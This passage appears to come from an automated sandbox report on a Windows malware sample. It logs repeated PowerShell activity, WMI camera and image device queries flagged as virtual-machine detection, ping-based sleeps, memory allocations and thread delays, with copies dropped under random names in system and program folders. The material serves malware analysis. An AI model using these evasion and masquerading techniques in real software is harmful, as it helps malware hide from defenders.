Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\opHipgZM6eS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Memory allocated: 1220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Memory allocated: 1B0B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\CbsTemp\ctfmon.exe	Memory allocated: 9D0000 memory reserve \| memory write watch
Source: C:\Windows\CbsTemp\ctfmon.exe	Memory allocated: 1A7E0000 memory reserve \| memory write watch
Source: C:\Windows\CbsTemp\ctfmon.exe	Memory allocated: 1400000 memory reserve \| memory write watch
Source: C:\Windows\CbsTemp\ctfmon.exe	Memory allocated: 1ADE0000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Memory allocated: 2750000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Memory allocated: 1A920000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Memory allocated: B20000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Memory allocated: 1A980000 memory reserve \| memory write watch
Source: C:\Recovery\opHipgZM6eS.exe	Memory allocated: 1620000 memory reserve \| memory write watch
Source: C:\Recovery\opHipgZM6eS.exe	Memory allocated: 1B190000 memory reserve \| memory write watch
Source: C:\Recovery\opHipgZM6eS.exe	Memory allocated: 1630000 memory reserve \| memory write watch
Source: C:\Recovery\opHipgZM6eS.exe	Memory allocated: 1B040000 memory reserve \| memory write watch
Source: C:\Recovery\RuntimeBroker.exe	Memory allocated: 31A0000 memory reserve \| memory write watch
Source: C:\Recovery\RuntimeBroker.exe	Memory allocated: 1B1A0000 memory reserve \| memory write watch
Source: C:\Recovery\RuntimeBroker.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch
Source: C:\Recovery\RuntimeBroker.exe	Memory allocated: 1AEA0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Memory allocated: C90000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Memory allocated: 1A690000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Memory allocated: B90000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Memory allocated: 1A800000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Memory allocated: B70000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Memory allocated: 1A640000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Memory allocated: 1720000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Memory allocated: 1B0A0000 memory reserve \| memory write watch
Source: C:\Recovery\opHipgZM6eS.exe	Memory allocated: 2650000 memory reserve \| memory write watch
Source: C:\Recovery\opHipgZM6eS.exe	Memory allocated: 1A8C0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\CbsTemp\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\CbsTemp\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 599872
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 599625
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 598907
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 598610
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 596110
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 595735
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 595485
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 594969
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 594641
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 594297
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 593719
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 593360
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 593032
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 592688
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 592157
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 591782
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 591297
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 590828
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 590453
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 590245
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 589891
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 589594
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 589219
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 588719
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 588360
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 587985
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 586889
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 586438
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 586000
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 585679
Source: C:\Recovery\opHipgZM6eS.exe	Thread delayed: delay time: 585201
